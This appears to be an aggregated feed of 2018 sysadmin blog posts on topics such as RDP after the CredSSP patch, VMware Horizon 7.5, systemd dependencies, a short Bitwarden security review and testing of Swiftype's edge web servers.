It refers to CredSSP updates for CVE-2018-0886, which further explains the vulnerability and why it's been patched now. But here's the catch: if your client is updated but your server isn't (yet), you can no longer RDP to that machine. Here are a couple of fixes:

1. Find an old computer/RDP client to connect with
2. Get console access to the server to run the updates & reboot the machine

If your client has been updated, there's no way to connect to an unpatched Windows server via Remote Desktop anymore.

## May 08, 2018

### Sean's IT Blog

#### VMware Horizon and Horizon Cloud Enhancements – Part 1

This morning, VMware announced enhancements to both the on-premises Horizon Suite and Horizon Cloud product sets. Although there are a lot of additions to all the products in the Suite, the VMware blog post did not go too in-depth into many of the new features that you’ll be seeing in the upcoming editions. 
### VMware Horizon 7.5

Let’s start with the biggest news in the blog post – the announcement of Horizon 7.5. Horizon 7.5 brings several new, long-awaited features with it. Some of these features are:

1. Support for Horizon on VMC (VMware on AWS)
2. The “Just-in-Time” Management Platform (JMP)
3. Horizon 7 Extended Service Branch (ESB)
4. Instant Clone improvements, including support for the new vSphere 6.7 Instant Clone APIs
5. Support for IPv4/IPv6 Mixed-Mode Operations
6. Cloud-Pod Architecture support for 200K Sessions
7. Support for Windows 10 Virtualization-Based Security (VBS) and vTPM on Full Clone Desktops
8. RDSH Host-based GPO Support for managing protocol settings

I’m not going to touch on all of these items. I think the first four are the most important for this portion of the suite.

#### Horizon on VMC

Horizon on VMC is a welcome addition to the Horizon portfolio. Unlike Citrix, the traditional VMware Horizon product has not had a good cloud story because it has been tightly coupled to the VMware SDDC stack. By enabling VMC support for Horizon, customers can now run virtual desktops in AWS, or utilize VMC as a disaster recovery option for Horizon environments.

Full clone desktops will be the only desktop type supported in the initial release of Horizon on VMC. Instant Clones will be coming in a future release, but some additional development work will be required since Horizon will not have the same access to vCenter in VMC as it has in on-premises environments. I’m also hearing that Linked Clones and Horizon Composer will not be supported in VMC.

The initial release of Horizon on VMC will only support core Horizon, the Unified Access Gateway, and VMware Identity Manager. Other components of the Horizon Suite, such as UEM, vRealize Operations, and App Volumes, have not been certified yet (although there should be nothing stopping UEM from working in Horizon on VMC because it doesn’t rely on any vSphere components). 
Security Server, Persona Management, and ThinApp will not be supported.

#### Horizon Extended Service Branches

Under the current release cadence, VMware targets one Horizon 7 release per quarter. The current support policy for Horizon states that a release only continues to receive bug fixes and security patches if a new point release hasn’t been available for at least 60 days. Let’s break that down to make it a little easier to understand.

1. VMware will support any version of Horizon 7.x for the lifecycle of the product.
2. If you are currently running the latest Horizon point release (ex. Horizon 7.4), and you find a critical bug/security issue, VMware will issue a hot patch to fix it for that version.
3. If you are running Horizon 7.4, and Horizon 7.5 has been out for less than 60 days when you find a critical bug/security issue, VMware will issue a hot patch to fix it for that version.
4. If you are running Horizon 7.4, and Horizon 7.5 has been out for more than 60 days when you find a critical bug/security issue, the fix for the bug will be applied to Horizon 7.5 or later, and you will need to upgrade to receive the fix.

In larger environments, Horizon upgrades can be non-trivial efforts that enterprises may not undertake every quarter. There are also some verticals, such as healthcare, where core business applications are certified against specific versions of a product, and upgrading or moving away from that certified version can impact support or support costs for key business applications.

With Horizon 7.5, VMware is introducing a long-term support bundle for the Horizon Suite. This bundle will be called the Extended Service Branch (ESB), and it will contain Horizon 7, App Volumes, User Environment Manager, and Unified Access Gateway. The ESB will have 2 years of active support from its release date, during which it will receive hot fixes, and each ESB will receive three service packs with critical bug and security fixes and support for new Windows 10 releases. 
A new ESB will be released approximately every twelve months. Each ESB branch will support approximately 3-4 Windows 10 builds, including any recent LTSC builds. That means the Horizon 7.5 ESB release will support the Windows 10 1709, 1803, 1809, and 1809 LTSC builds. This packaging is nice for enterprise organizations that want to limit the number of Horizon upgrades they apply in a year or that require long-term support for core business applications. I see this being popular in healthcare environments. Extended Service Branches do not require any additional licensing, and customers will have the option to adopt either the current release cadence or the extended service branch when implementing their environment.

#### JMP

The Just-in-Time Management Platform, or JMP, is a new component of the Horizon Suite. The intention is to bring together Horizon, Active Directory, App Volumes, and User Environment Manager to provide a single portal for provisioning instant clone desktops, applications, and policies to users. JMP also brings a new HTML5 interface to Horizon.

I’m a bit torn on the concept. I like the idea behind JMP and providing a portal for enabling user self-provisioning. But I’m not sure building that portal into Horizon is the right place for it. A lot of organizations use Active Directory Groups as their management layer for Horizon Desktop Pools and App Volumes. There is a good reason for doing it this way: it’s easy to audit who has desktop or application access, and there are a number of ways to easily generate reports on Active Directory Group membership.

Many customers that I talk to are also attempting to standardize their IT processes around an ITSM platform that includes a Service Catalog. The most common one I run across is ServiceNow. 
The customers that I’ve talked to that want to implement self-service provisioning of virtual desktops and applications often want to do it in the context of their service catalog and approval workflows. It’s not clear right now if JMP will include an API that will allow customers to integrate it with an existing service catalog or service desk tool. If it does include an API, then I see it being an important part of automated, self-service end-user computing solutions. If it doesn’t, then it will likely be yet-another-user-interface, and the development cycles would have been better spent on improving the Horizon and App Volumes APIs.

Not every customer will be utilizing a service catalog, ITSM tool and orchestration. For those customers, JMP could be an important way to streamline IT operations around virtual desktops and applications and provide them some benefits of automation.

#### Instant Clone Enhancements

The release of vSphere 6.7 brought with it new Instant Clone APIs. The new APIs bring features to VMFork that seem new to pure vSphere admins but have been available to Horizon for some time, such as vMotion. The new APIs are why Horizon 7.4 does not support vSphere 6.7 for Instant Clone desktops. Horizon 7.5 will support the new vSphere 6.7 Instant Clone APIs. It is also backward compatible with the existing vSphere 6.0 and 6.5 Instant Clone APIs.

There are some other enhancements coming to Instant Clones as well. Instant Clones will now support vSGA and Soft3D. These settings can be configured in the parent image. And if you’re an NVIDIA vGPU customer, more than one vGPU profile will be supported per cluster when GPU Consolidation is turned on. NVIDIA GRID can only run a single profile per discrete GPU, so this feature will be great for customers that have Maxwell-series boards, especially the Tesla M10 high-density board that has four discrete GPUs. 
However, I’m not sure how beneficial it will be for customers that adopt Pascal-series or Volta-series Tesla cards, as these only have a single discrete GPU per board. There may be some additional design considerations that need to be worked out. Finally, there is one new Instant Clone feature for VSAN customers. Before I explain the feature, I need to explain how Horizon utilizes VMFork and Instant Clone technology. Horizon doesn’t just utilize VMFork – it adds its own layers of management on top of it to overcome the limitations of the first-generation technology. This is how Horizon was able to support Instant Clone vMotion when standard VMFork could not. This additional layer of management also allows VMware to do other cool things with Horizon Instant Clones without having to make major changes to the underlying platform. One of the new features coming in Horizon 7.5 for VSAN customers is the ability to use Instant Clones across cluster boundaries. For those who aren’t familiar with VSAN, it is VMware’s software-defined storage product. The storage boundary for VSAN aligns with the ESXi cluster, so I’m not able to stretch a VSAN datastore between vSphere clusters. So if I’m running a large EUC environment using VSAN, I may need multiple clusters to meet the needs of my user base, and unlike 3-tier storage, I can’t share VSAN datastores between clusters. Under the current setup in Horizon 7.4, I would need to have a copy of my gold/master/parent image in each cluster. Due to some changes made in Horizon 7.5, I can now share an Instant Clone gold/master/parent image across VSAN clusters without having to make a copy of it in each cluster first. I don’t have too many specific details on how this will work, but it could significantly reduce the management burden of large, multi-cluster Horizon environments on VSAN.
#### Blast Extreme Enhancements

The addition of Blast Extreme Adaptive Transport, or BEAT as it’s commonly known, provided an enhanced session remoting experience when using Blast Extreme. It also required users and administrators to configure which transport they wanted to use in the client, and this could lead to a less than optimal experience for users who frequently moved between locations with good and bad connectivity. Horizon 7.5 adds some automation and intelligence to BEAT with a feature called Blast Extreme Network Intelligence. NI will evaluate network conditions on the client side and automatically choose the correct Blast Extreme transport to use. Users will no longer have to make that choice or make changes in the client, and as a result, the Excellent, Typical, and Poor options are being removed from future versions of the Horizon client. Another major enhancement coming to Blast Extreme is USB Redirection Port Consolidation. Currently, USB redirection utilizes a side channel that requires an additional port to be opened in any external-facing firewalls. Starting in Horizon 7.5, customers will have the option to utilize USB redirection over ports 443/8443 instead of the side channel.

#### Performance Tracker

The last item I want to cover in this post is Performance Tracker. Performance Tracker, which Pat Lee demonstrated at VMworld last year, is a tool that presents session performance metrics to end users. It supports both Blast Extreme and PCoIP, provides information such as session latency, frames per second, and the Blast Extreme transport type, and helps with troubleshooting connectivity issues between the Horizon Agent and the Horizon Client.

#### Part 2

As you can see, there is a lot of new stuff in Horizon 7.5. We’ve hit 1900 words in this post just talking about what’s new in Horizon, and we haven’t touched on client improvements, Horizon Cloud, App Volumes, UEM, or Workspace One Intelligence yet.
So we’ll have to break those announcements into another post that will be coming in the next day or two.

### Everything Sysadmin

#### SO (my employer) is hiring a Windows SRE/sysadmin in NY/NJ

Come work with Stack Overflow's SRE team! We're looking for a Windows system administrator / SRE to join our SRE team at Stack Overflow. (The downside is that I'll be your manager... ha ha ha). Anyway... the full job description is here: https://stackoverflow.com/company/work-here/1152509/

A quick and unofficial FAQ:

Q: NYC/NJ? I thought Stack was a "remote first" company! Whudup with that?

A: While most of the SRE team works remotely, we like to have a few team members near each of our datacenters (Jersey City, NJ and Denver, CO). You won't be spending hours each week pulling cables, I promise you. In fact, we use remote KVMs and a "remote hands" service for most things. Heck, a lot of our new products are running in "the cloud" (and probably more over time). That said, it's good to have 1-2 people within easy travel distance of the datacenters for emergencies.

Q: Can I work from home?

A: Absolutely. You can work from home (we'll ship you a nice desk, chair and other great stuff) or you can work from our NYC office (see the job advert for a list of perks). Either way, you will need to be able to get to the Jersey City, NJ data center in a reasonable amount of time (like... an hour).

Q: Wait... Windows?

A: Yup. We're a mixed Windows and Linux environment. We're doing a lot of cutting edge stuff with Windows. We were early adopters of PowerShell (if you love PowerShell, definitely apply!) and DSC and a number of other technologies. Microsoft's containers are starting to look good too (hint, hint).

Q: You mentioned another datacenter in Denver, CO. What if I live near there?

A: This position is designated as "NY/NJ". However, watch this space. Or, if you are impatient, contact me and I'll loop you in.

Q: Where do I get more info? How do I apply?
## May 07, 2018

### SysAdmin1138

#### Systemd dependencies

There is a lot of hate around Systemd in unixy circles. Like, a lot. There are many reasons for this; a short list:

• For some reason they felt the need to reimplement daemons that have existed for years, and are finding the same kinds of bugs those older daemons found and squashed over a decade ago. (I'm looking at you, time-sync and DNS resolver.)
• It takes away an init system that everyone knows and is well documented, in both the official documentation sense and the unofficial 'millions of blog-posts' sense. Blog posts like this one.
• It has so many incomprehensible edge-cases that make reasoning about the system even harder.
• The maintainers are steely-eyed fundamentalists who know exactly how they want everything.
• Because it runs so many things in parallel, bugs we've never had to worry about are now impossible to ignore.

So much hate. Having spent the last few weeks doing a sysv -> systemd migration, I've found another reason for that hate, and it's one I'm familiar with because I've spent so many years in the Puppet ecosystem. People love to hate on Puppet because of the wacky non-deterministic bugs. The order resources are declared in a module is not the order in which they are applied. Puppet uses a dependency model to determine the order of things, which leads to weird bugs where a thing has worked for two weeks but suddenly stops working that way because a new change was made somewhere that changed the order of resource-application. A large part of why people like Chef over Puppet is because Chef behaves like a scripting language, where the order of the file is the order things are done in. Guess what? Systemd uses the Puppet model of dependency! This is why it's hard to reason about. And why I, someone who has been handling these kinds of problems for years, haven't spent much time shaking my tiny fist at an uncaring universe. There has been swearing, oh yes. But of a somewhat different sort.
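The Puppet side of this can be sketched with a small, hypothetical manifest (resource names invented for illustration). Declaration order in the file is irrelevant; only the declared edges determine apply order:

```puppet
# Apply order is derived from these edges, not from file order.
package { 'nginx':
  ensure => installed,
}

file { '/etc/nginx/nginx.conf':
  ensure  => file,
  content => "worker_processes auto;\n",
  require => Package['nginx'],   # apply only after the package is installed
  notify  => Service['nginx'],   # restart the service if this file changes
}

service { 'nginx':
  ensure => running,
  enable => true,
}
```

Any resource with no declared edge to these three can land anywhere in the run, which is how an unrelated change elsewhere in the catalog can silently reorder things that only worked by accident.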
The Puppet Model

Puppet has two kinds of dependency: strict ordering, and "do this if that other thing does something". Which makes for four ways of linking resources:

• requires => Do this after this other thing.
• before => Do this before this other thing.
• subscribes => Do this after this other thing, but only if this other thing changes something.
• notifies => Do this before this other thing, and tell it you changed something.

This makes for some real power, while also making the system hard to reason about. Thing is, systemd goes a step further.

The Systemd Model

Systemd also has dependencies, but it was also designed to run as much in parallel as possible. Puppet was written in Ruby, so it has strong single-threaded tendencies. Systemd is multi-threaded. Multi-threaded systems are harder to reason about in general. Add dependency ordering on top of multi-threading issues and you get a sheer cliff of learning before you can have a hope of following along. Even better (worse), systemd has more ways of defining relationships:

• Before= This unit needs to get all the way done before the named units are even started. And the named units only get started if this unit finishes successfully.
• After= This unit only gets started if the named units run to completion first, successfully.
• Requires= The named units will get started if this one is, and do so at the same time. Not only that, but if the named units are explicitly stopped, this one will be stopped as well. For puppet-heads, this breaks things since it works backwards.
• BindsTo= Does everything Requires= does, but will also stop this unit if the named unit stops for any reason, not just explicit stops.
• Wants= Like Requires=, but less picky. The named units will get started, but this unit doesn't care if they can't start or end up failing.
• Requisite= Like Requires=, but will fail immediately if the named units aren't started yet. Think of mount units not starting unless the device unit is already started.
• Conflicts= A negative dependency. Turn this unit off if the named unit is started, and turn the named unit off if this unit is started.

There are several more I'm not going into. This is a lot, and some of these work independently. The documentation even says:

It is a common pattern to include a unit name in both the After= and Requires= options, in which case the unit listed will be started before the unit that is configured with these options.

Using both After= and Requires= means that the named units need to get all the way done (After=) before this unit is started, and that if this unit is started, the named units need to get started as well (Requires=).

Hence, in many cases it is best to combine BindsTo= with After=.

Using both configures a hard dependency relationship. After= means the other unit needs to be all the way started before this one is started. BindsTo= makes it so that this unit is only ever in an active state when the unit named in both BindsTo= and After= is in an active state. If that other unit fails or goes inactive, this one will as well. There is also a concept missing from Puppet, and that's when the dependency fires. After=/Before= are trailing-edge triggers: they fire on completion, which is how Puppet works. Most of the rest are leading-edge triggered, where the dependency is satisfied as soon as the named units start. This is how you get parallelism in an init-system, and why the weirder dependencies are often combined with either Before= or After=. Systemd hate will continue for the next 10 or so years, at least until most Linux engineers have been working with it long enough to stop grumbling about how nice the olden days were. It also means that fewer people will be writing startup services, due to the complexity of doing anything other than 'start this after this other thing' ordering.

## May 02, 2018

### ma.ttias.be

#### DNS Spy now checks for the “Null MX”

The post DNS Spy now checks for the “Null MX” appeared first on ma.ttias.be.
A small but useful addition to the scoring system of DNS Spy: support for the Null MX record.

Internet mail determines the address of a receiving server through the DNS, first by looking for an MX record and then by looking for an A/AAAA record as a fallback. Unfortunately, this means that the A/AAAA record is taken to be the mail server address even when that address does not accept mail. The No Service MX RR, informally called "null MX", formalizes the existing mechanism by which a domain announces that it accepts no mail, without having to provide a mail server; this permits significant operational efficiencies.

Give it a try at the DNS Spy Scan page. The post DNS Spy now checks for the “Null MX” appeared first on ma.ttias.be.

## May 01, 2018

### Anton Chuvakin - Security Warrior

#### Monthly Blog Round-Up – April 2018

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts based on last month’s visitor data (excluding other monthly or annual round-ups):

1. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using a now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our research on developing security monitoring use cases here – and we just UPDATED IT FOR 2018.
2. “Simple Log Review Checklist Released!” is often at the top of this list – this rapidly aging checklist is still a useful tool for many people. “On Free Log Management Tools” (also aged quite a bit by now) is a companion to the checklist (updated version).
3. “Updated With Community Feedback SANS Top 7 Essential Log Reports DRAFT2” is about the top log reports project of 2008-2013; I think these are still very useful in response to “what reports will give me the best insight from my logs?”
4. Again, my classic PCI DSS Log Review series is extra popular!
The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book – note that this series is even mentioned in some PCI Council materials.
5. “Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM”…

In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 7X the traffic of this blog]:

Critical reference posts:
Current research on testing security:
Current research on threat detection “starter kit”:
Just finished research on SOAR:
Miscellaneous fun posts:

(see all my published Gartner research here)

Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Other posts in this endless series:

### Electricmonk.nl

#### A short security review of Bitwarden

Bitwarden is an open source online password manager: "The easiest and safest way for individuals, teams, and business organizations to store, share, and sync sensitive data." Bitwarden offers both a cloud hosted and an on-premise version. Some notes on the scope of this blog post and disclaimers:

• I only looked at the cloud hosted version.
• This security review is not exhaustive; I only spent a few minutes reviewing various things.
• I'm not a security researcher, just a paranoid enthusiast. If you find anything wrong with this blog post, please contact me at ferry DOT boender (AT) gmaildotcom.

Here are my findings:

## Encryption password sent over the wire

There appears to be no distinction between the authentication password and the encryption password. When logging in, the following HTTP POST is made to Bitwarden's server:

    client_id: web
    grant_type: password
    password: xFSJdHvKcrYQA0KAgOlhxBB3Bpsuanc7bZIKTpskiWk=
    scope: api offline_access
    username: some.person@gmail.com

That's a base64 encoded password. (Don't worry, I anonymized all secrets in this post; besides, it's all throw-away passwords anyway.) Let's see what it contains:

    >>> import base64
    >>> base64.b64decode('xFSJdHvKcrYQA0KAgOlhxBB3Bpsuanc7bZIKTpskiWk=')
    b'p\x54\xde\x35\xb6\x90\x992\x63bKn\x7f\xfbb\xb2\x94t\x1b\xe9f\xe2\xeaz}e\x142X#\xbd\x1c'

Okay, at least that's not my plain text password. It is encoded, hashed or encrypted somehow, but I'm not sure how. Still, it makes me nervous that my password is being sent over the wire. The master password used for encryption should never leave a device, in any form. I would have expected two passwords here, perhaps: one for authentication and one for encryption. The reason it was implemented this way is probably because of the "Organizations" feature, which lets you share passwords with other people. Sharing secrets among people is probably hard to do in a secure way. I'm no cryptography expert, but there are probably ways to do this more securely using asymmetric encryption (public and private keys), which Bitwarden doesn't appear to be using. Bitwarden has a FAQ entry about its use of encryption, which claims that passwords are never sent over the wire unencrypted or unhashed:

Bitwarden always encrypts and/or hashes your data on your local device before it is ever sent to the cloud servers for syncing. The Bitwarden servers are only used for storing encrypted data.
It is not possible to get your unencrypted data from the Bitwarden cloud servers.

The FAQ entry on hashing is also relevant:

Bitwarden salts and hashes your master password with your email address on the client (your computer/device) before it is transmitted to our servers. Once the server receives the hashed password from your computer/device it is then salted again with a cryptographically secure random value, hashed again and stored in our database. This process is repeated and hashes are compared every time you log in. The hashing functions that are used are one way hashes. This means that they cannot be reverse engineered by anyone at Bitwarden to reveal your true master password. In the hypothetical event that the Bitwarden servers were hacked and your data was leaked, the data would have no value to the hacker.

However, there's a major caveat here which they don't mention: all of the encryption is done client-side by Javascript loaded from various servers and CDNs. This means that an attacker who gains control over any of these servers (or man-in-the-middles them somehow) can inject any javascript they like, and obtain your password that way.

## Indiscriminate allowance / loading of external resources

The good news is that Bitwarden uses Content-Security-Policy. The bad news is that it allows the loading of resources from a variety of untrusted sources.
uMatrix shows the type of resources it's trying to load from various sources. Here's what the Content-Security-Policy looks like:

    content-security-policy: default-src 'self'; script-src 'self' 'sha256-ryoU+5+IUZTuUyTElqkrQGBJXr1brEv6r2CA62WUw8w=' https://www.google-analytics.com https://js.stripe.com https://js.braintreegateway.com https://www.paypalobjects.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com https://assets.braintreegateway.com https://*.paypal.com https://fonts.googleapis.com; img-src 'self' data: https://icons.bitwarden.com https://*.paypal.com https://www.paypalobjects.com https://q.stripe.com https://haveibeenpwned.com https://chart.googleapis.com https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com https://fonts.gstatic.com; child-src 'self' https://js.stripe.com https://assets.braintreegateway.com https://*.paypal.com https://*.duosecurity.com; frame-src 'self' https://js.stripe.com https://assets.braintreegateway.com https://*.paypal.com https://*.duosecurity.com;

Roughly translated, it allows indiscriminate loading and executing of scripts, css, web workers (background threads) and inclusion of framed content from a wide variety of untrusted sources such as CDNs, Paypal, Duosecurity, Braintreegateway, Google, etc. Some of these I know, some I don't. Trust I have in none of them. It would take too long to explain why this is a bad idea, but the gist of it is that the more resources you load and allow from different sources, the bigger the attack surface becomes. Perhaps these are perfectly secure (right now…), but an important part of security is the developers' security mindset. Some of these resources could have easily been hosted on the same origin servers. Some of these resources should only be allowed to run from payment pages.
It shows sloppy configuration of the Content-Security-Policy, namely site-wide configuration in the web server (probably) rather than policies determined on a URL-by-URL basis. The actual client-side encryption library is loaded from vault.bitwarden.com, which is good. However, the (possibility of) inclusion of scripts from other sources negates any security benefits of doing so. The inclusion of Google Analytics in a password manager is, in my opinion, inexcusable. It's not required functionality for the application, so it shouldn't be in there.

## New password entry is sent securely

When adding a new authentication entry, the entry appears to be client-side encrypted in some way before sending it to the server:

    {
      "name": "2.eD4fFLYUWmM6sgVDSA9pTg==|SNzQjLitpA5K+6qrBwC7jw==|DlfVCnVdZA9+3oLej4FHSQwwdo/CbmHkL2TuwnfXAoI=",
      "organizationId": null,
      "fields": null,
      "notes": null,
      "favorite": false,
      "login": {
        "username": null,
        "password": "2.o4IO/yzz6syip4UEaU4QpA==|LbCyLjAOHa3m2wopsqayYK9O7Q5aqnR8nltUgylwSOo=|6ajVAh0r9OaBs+NgLKrTd+j3LdBLKBUbs/q8SE6XvUE=",
        "totp": null
      },
      "folderId": null,
      "type": 1
    }

It's base64 again, and decodes into the same kind of obscure binary string as the password sent when logging in. I have not spent time looking at how exactly the encoding / encryption is happening, so I cannot claim that this is actually secure. So keep that in mind. It does give credence to Bitwarden's claims that all sensitive data is encrypted client-side before sending it to the server.

## Disclosure of my email address to a third party without my consent

I clicked on the "Data breach report" link on the left, and Bitwarden immediately sent my email address to https://haveibeenpwned.com. No confirmation, no nothing; it was disclosed to a third party immediately. Well, actually, since I use uMatrix to firewall my browser, it wasn't, and I had to explicitly allow it to do so, but even most security nerds don't use uMatrix. That's not cool.
Don't disclose my info to third parties without my consent.

## Developer mindset

One of, if not the, most important aspects is the developer mindset. That is, do they care about security and are they knowledgeable in the field? Bitwarden appears to know what they're doing. They have a security policy and run a bug bounty program. Security incidents appear to be solved quickly. I'd like to see more documentation on how the encryption, transfer, and storage of secrets works. Right now, there are some FAQ entries, but it's all promises that give me no insight into where and how the applied security might break down. One thing that bothers me is that they do not disclose any of the security trade-offs they made and how those impact the security of your secrets. I'm always wary when claims of perfect security are made, whether explicitly or by omission of information. There are obvious problems with client-side javascript encryption, which every developer and user with a reasonable understanding of web development recognises. No mention of this is made. Instead, security concerns are waved away with "everything is encrypted on your device!". That's nice, but if attackers can control the code that does the encryption, all is lost. Please note that I'm not saying that client-side javascript encryption is a bad decision! It's a perfectly reasonable trade-off between the convenience of being able to access your secrets on all your devices and a more secure way of managing your passwords. However, this trade-off should be disclosed prominently to users.

## Conclusion

So, is Bitwarden (Cloud) secure and should you use it? Unfortunately, I can't give you any advice. It all depends on your requirements. All security is a trade-off between usability, convenience and security. I did this review because my organisation is looking into a self-hosted Open Source password manager to manage our organisation's secrets. Would I use this to keep my personal passwords in?
The answer is: no. I use an offline Keepass, which I manually sync from my laptop to my phone every now and then. This is still the most secure way of managing passwords that I do not need to share with anyone. However, that's not the use-case that I reviewed Bitwarden for. So would I use it to manage our organisation's secrets? Perhaps; the jury is still out on that. I'll need to look at the self-hosted version to see if it also includes Javascript from unreliable sources. If so, I'd have to say that, no, I would not recommend Bitwarden.

## April 30, 2018

### ma.ttias.be

#### Certificate Transparency logging now mandatory

The post Certificate Transparency logging now mandatory appeared first on ma.ttias.be.

All certificates are now required to be logged in publicly available logs (aka "Certificate Transparency").

Since January 2015, Chrome has required that Extended Validation (EV) certificates be CT-compliant in order to receive EV status. In April 2018, this requirement will be extended to all newly-issued publicly-trusted certificates -- DV, OV, and EV -- and certificates failing to comply with this policy will not be recognized as trusted when evaluated by Chrome.

In other words: if Chrome encounters a certificate, issued after April 2018, that isn't logged in a Certificate Transparency log, the certificate will be marked as insecure. Don't want to have this happen to you out of the blue? Monitor your sites and their certificate health via Oh Dear!.

The post Certificate Transparency logging now mandatory appeared first on ma.ttias.be.

## April 28, 2018

### Homo-Adminus

#### Edge Web Server Testing at Swiftype

This article has been originally posted on Swiftype Engineering blog. For any modern technology company, a comprehensive application test suite is an absolute necessity. Automated testing suites allow developers to move faster while avoiding any loss of code quality or system stability.
Software development has seen great benefit come from the adoption of automated testing frameworks and methodologies. However, the culture of automated testing has neglected one key area of the modern web application serving stack: web application edge routing and multiplexing rulesets. From modern load balancer appliances that allow for TCL-based rule sets, to locally or remotely hosted Varnish VCL rules, to the power and flexibility that Nginx and OpenResty make available through Lua, edge routing rulesets have become a vital part of application serving controls. Over the past decade or so, it has become possible to incorporate more and more logic into edge web server infrastructures. Almost every modern web server has support for scripting, enabling developers to make their edge servers smarter than ever before. Unfortunately, the application logic configured within web servers is often much harder to test than that hosted directly in application code, and thus too often software teams resort to manual testing, or worse, to customers as testers, by shipping their changes to production without any edge routing testing having been performed. In this post, I would like to explain the approach Swiftype has taken to ensure that our test suites account for our use of complex edge web server logic to manage our production traffic flow, and thus that we can confidently deploy changes to our application infrastructure with little or no risk.

### Our Web Infrastructure

Before I go into details of our edge web server configuration testing, it may be helpful to share an overview of the infrastructure behind our web services and applications. Swiftype has evolved from a relatively simple Rails monolith and is still largely powered by a set of Ruby applications served by Unicorn application servers. To balance traffic between the multitude of application instances, we use Haproxy (mainly for its observability features and its fair load balancing implementation).
Finally, there is an OpenResty (nginx+lua) layer at the edge of our infrastructure that is responsible for many key functions: SSL termination and enforcement, rate limiting, as well as providing flexible traffic management and routing functionality (written in Lua) customized specifically for the Swiftype API. Here is a simple diagram of our web application infrastructure:

Swiftype web infrastructure overview

### Testing Edge Web Servers

Swiftype’s edge web server configuration contains thousands of lines of code: from Nginx configs, to custom templates rendered during deployment, to complex Lua logic used to manage production API traffic. Any mistake in this configuration, if not caught in testing, could lead to an outage at our edge, and considering that 100% of our API traffic is served through this layer, any outage at the edge is likely to be very impactful to our customers and our business. This is why we have invested time and resources in building a system that allows us to test our edge configuration changes in development and on CI before they are deployed to production systems.

#### Testing Workflow Overview

The first step in safely introducing change is ensuring that development and testing environments are quarantined from production environments. To do this we have created an “isolated” runtime mode for our edge web server stack. All changes to our edge configurations are first developed and run in this “isolated” mode. The “isolated” mode has no references to production backend infrastructure, and thus, by employing the “isolated” mode, developers are able to iterate very quickly in a local environment without fear of harmful repercussions. All tests written to run in the “isolated” mode employ a mock server to emulate production backends and primarily focus on the unit-testing of specific new features that are being implemented.
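To make the mock-server idea concrete, here is a minimal, self-contained sketch of an isolated-mode check using only the Ruby standard library. The real suite is built on RSpec plus a custom framework, and the path, port, and response below are invented; in a real run the request would first pass through the local OpenResty instance, which would then proxy to the mock:

```ruby
require 'socket'
require 'net/http'

# A tiny mock backend standing in for the production app tier.
received_paths = []
server = TCPServer.new('127.0.0.1', 18_080)

Thread.new do
  loop do
    client = server.accept
    request_line = client.gets # e.g. "GET /api/v1/search HTTP/1.1"
    received_paths << request_line.split[1]
    # Drain the request headers before answering.
    while (line = client.gets) && line != "\r\n"; end
    body = '{"results":[]}'
    client.write("HTTP/1.1 200 OK\r\n" \
                 "Content-Type: application/json\r\n" \
                 "Content-Length: #{body.bytesize}\r\n" \
                 "Connection: close\r\n\r\n#{body}")
    client.close
  end
end

# The "test": call the service, then assert both on the response and on
# what the mock actually received.
response = Net::HTTP.get_response(URI('http://127.0.0.1:18080/api/v1/search'))

raise 'wrong status'       unless response.code == '200'
raise 'wrong body'         unless response.body == '{"results":[]}'
raise 'wrong backend call' unless received_paths == ['/api/v1/search']
puts 'isolated-mode checks passed'
```

Because the mock records every request it serves, the same harness can assert that the edge layer forwarded (or rewrote) exactly what was expected, not just that the final response looked right.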
When we are confident enough in our unit-tested set of changes, we can run the same set of tests in an “acceptance testing” mode, in which the mock server used in isolated tests is replaced with a Haproxy load balancer with access to production networks. Working on tests and running them in this mode allows us to ensure with the highest degree of certainty that our changes will work in a real production environment, since we exercise our whole stack while running the test suite.

#### Testing Environment Overview

Our testing environment employs Docker containers to serve in place of our production web servers. The test environment is comprised of the following components:

• A loopback network interface on which a full complement of production IPs are configured to account for every service we are planning to test (e.g. a service foo.swiftype.com pointing to an IP address 10.1.0.x in production is tested in a local “isolated” testing environment with IP 10.1.0.x assigned to an alias on the local loopback interface). This allows us to perform end-to-end testing: DNS resolution, TCP service connections to a specific IP address, etc., without needing access to production, nor local /etc/hosts or name resolution changes.
• For use cases where we are testing changes that are not represented in DNS (for example, when preparing edge servers for serving traffic currently handled by a different service), we may still employ local /etc/hosts entries to point the DNS name for a service to a local IP address for the period of testing. In this scenario, we ensure that our tests have been written in a way that is independent of the DNS configuration, and thus that the tests can be reused at a later date, or when the configuration has been deployed to production.
• An OpenResty server instance with the configuration we need to test.
• A test runner process (based on RSpec and a custom framework for writing our tests).
• An optional mock server.
As noted above, the mock server might run in Docker in a local test environment or in CI. It is driven as part of the test runner process, and either emulates an external application/service, serves in place of a production backend, or acts as a local Haproxy instance running a production configuration that may even route traffic to real production backends.

#### Isolated Testing Walkthrough

Here is how a test for a hypothetical service foo.swiftype.com (registered in DNS as 1.2.3.4) is performed in an isolated environment:

1. We automatically assign 1.2.3.4 as an alias on a loopback interface.

2. We start a mock server listening on localhost, configured to respond on the same port used by the foo.swiftype.com Nginx server backend (in production, there would be a haproxy on that port) with a specific stub response.

3. Our test performs a DNS resolution for foo.swiftype.com, receives 1.2.3.4 as the IP of the service, connects to the local Nginx instance listening on 1.2.3.4 (bound to a loopback interface), and performs a test call.

4. Nginx, receiving the test request, performs all configured operations and forwards the request to a backend, which in this case is handled by the local mock server. The call result is then returned by Nginx to the test runner.

